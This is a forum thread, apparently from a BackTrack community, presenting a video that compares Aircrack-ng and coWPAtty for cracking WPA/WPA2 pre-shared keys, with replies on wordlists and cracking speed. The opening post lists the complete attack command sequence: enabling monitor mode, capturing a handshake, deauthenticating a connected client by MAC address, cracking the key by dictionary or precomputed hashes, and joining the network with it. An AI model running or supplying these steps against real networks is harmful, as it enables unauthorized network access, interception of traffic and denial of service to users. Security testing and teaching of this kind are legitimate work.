[Video] Cracking WiFi - WPA/WPA2 (Aircrack-ng vs coWPAtty)

Links
Watch videoon-line: http://g0tmi1k.blip.tv/file/3356785
Download video: http://www.mediafire.com/?9dkjbygu238p2uj


What is this?
Comparing Aircrack-ng versus coWPAtty, in the time it takes to crack a WPA2 PSK key.
It shows 4 different cracks, the time taken and speed of the crack (see results).
> Aircrack-ng (Dictionary)
> Aircrack-ng & airolib-ng (Pre-computed hashes)
> coWPAtty (Dictionary)
> coWPAtty & Genpmk (Pre-computed hashes)


How does this work?
To crack WPA/WPA2 PSK you need to capture a ‘Handshake’ . The best way to this packet the attacker needs to disconnect a connected client currently on the network (if the attacker keeps on repeating this part, it will be a DoS to the user).

Once the key packet has been captured, it is time to start an offline dictionary attack. If the network key is in the dictionary, its just a question of waiting to process the dictionary file.

From here, the attacker can use that key to decrypt the captured data from before, and now is able to ‘read’ it as well as join the network.

If there isn't a connected client - you cant do this. If the network key isnt in the dictionary file - you cant do this.

You can speed the the cracking process by creating pre-calculated hash files (see results - for how much faster!)

Results
*For the table see blog*

http://lh6.ggpht.com/_22JypvVTrFI/S6...s800/WPA2-.png

http://lh6.ggpht.com/_22JypvVTrFI/S6...WPA2-Brute.png

http://lh4.ggpht.com/_22JypvVTrFI/S6...0/WPA2-Pre.png

http://lh4.ggpht.com/_22JypvVTrFI/S6...eCalculate.png

What do I need?
> Aircrack-ng suite
> WiFi card that supports monitor mode
> Big dictionary
> Processing power


Software
Name: Aircrack-ng
Version: 1.0-rc3
Home Page: http://www.aircrack-ng.org/doku.php
Download Link: http://download.aircrack-ng.org/airc...1.0-rc3.tar.gz

Name: coWPAtty
Version: 4.3
Home Page: http://www.willhackforsushi.com/Cowpatty.html
Download Link: http://www.willhackforsushi.com/code/cowpatty/4.3/cowpatty-4.3.tgz

Commands:

Code:

---

airmon-ng start wlan0
airodump-ng mon0

airodump-ng --channel 5 --write output --bssid 00:24:B2:A0:51:14 mon0

aireplay-ng --deauth 1 -a 00:24:B2:A0:51:14 -c 00:14:17:94:90:0D mon0
aircrack-ng output-01.cap -w /root/tools/dictionaries/webster-dictionary.txt



airolib-ng crackwpa --import passwd /root/dictionaries/webster-dictionary.txt
airolib-ng crackwpa --import essid essid
airolib-ng crackwpa --stats
airolib-ng crackwpa --clean all
airolib-ng crackwpa --batch
airolib-ng crackwpa --verify all
aircrack -r crackwpa output-01.cap



cowpatty -s g0tmi1k -r /root/output-01.cap -f /root/dictionaries/webster-dictionary.txt



genpmk -s g0tmi1k -d /root/output-hash -f /root/dictionaries/webster-dictionary.txt
cowpatty -s g0tmi1k -r /root/output-01.cap -d /root/output-hash



wpa_passphrase g0tmi1k precivilization > wpa.conf
wpa_supplicant -Dwext -iwlan0 -c /root/wpa.conf
dhclient -r
dhclient wlan0
ping 192.168.1.1

---

Notes:
Song: First Sate - Off the Radar (First State's 808 Clash Mix)
Video length: 08:38
Capture length: 01:14:29


Blog Post: http://g0tmi1k.blogspot.com/2010/02/...rcrack-ng.html
Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/2394-%5Bvideo%5D-cracking-wifi-wpa-wpa2-aircrack-ng-vs-cowpatty.html

Thank you my dear, but how can I get a dictionary:(

You can find tons of different dictionaries all over the net just do some searching ;)
Remember google is your friend!

Quote:

---

Originally Posted by SAIEF007S

Thank you my dear, but how can I get a dictionary:(

---

Ive posted a few on my blog. Link was in the top post, but incase you didnt see it:
g0tmi1k: [Site News] February Update - ISOs and Dictionaries

so how would i use a dictionary i download if i use backtrack on a live boot cd

Quote:

---

Originally Posted by canihitdat

so how would i use a dictionary i download if i use backtrack on a live boot cd

---

that's what i also would like to know if anyone could post a response with a link to a tutorial that would be great

Quote:

---

Originally Posted by codehpro

that's what i also would like to know if anyone could post a response with a link to a tutorial that would be great

---

After downloading a dictionary...
replace: /root/dictionaries/webster-dictionary.txt
with: [Whereever you downloaded the file to!] EXAMPLE /root/dictionarythatijustdownloaded.dic

What CPU did you use to get that results?
If you have multi-core processor, have you noticed that aircrack-ng uses several cores whereas coWPAtty uses just one independent core?

Quote:

---

Originally Posted by codehpro

that's what i also would like to know if anyone could post a response with a link to a tutorial that would be great

---

There is a default BT4 dictionary located in /pentest/passwords/wordlists that contains about 1.7M words...if you want more extensive ones google them..i did just recently and found nice supply of them.
As for usage you should study man pages of aircrack-ng or their tutorials at official pages.

Quote:

---

Originally Posted by dareeek

What CPU did you use to get that results?
If you have multi-core processor, have you noticed that aircrack-ng uses several cores whereas coWPAtty uses just one independent core?

---

Not sure. It was a while ago I did this.
Would of been on my laptop - so nothing higher than a duo core 2GHz (if that!)
Yeah. Your right, coWPAtty only does use one core, whereas aircrack-ng uses more...
Another hint for speed is to split the dictionaries in more parts and run more instances of your cracking utility. Source

Quote:

---

Originally Posted by CrazyBranch

There is a default BT4 dictionary located in /pentest/passwords/wordlists that contains about 1.7M words...if you want more extensive ones google them..i did just recently and found nice supply of them.
As for usage you should study man pages of aircrack-ng or their tutorials at official pages.

---

Im also hosting and working on my own collection of wordlists.
I haven't done WiFI pentesting since recording this video. When I get the time, Ill look into it more.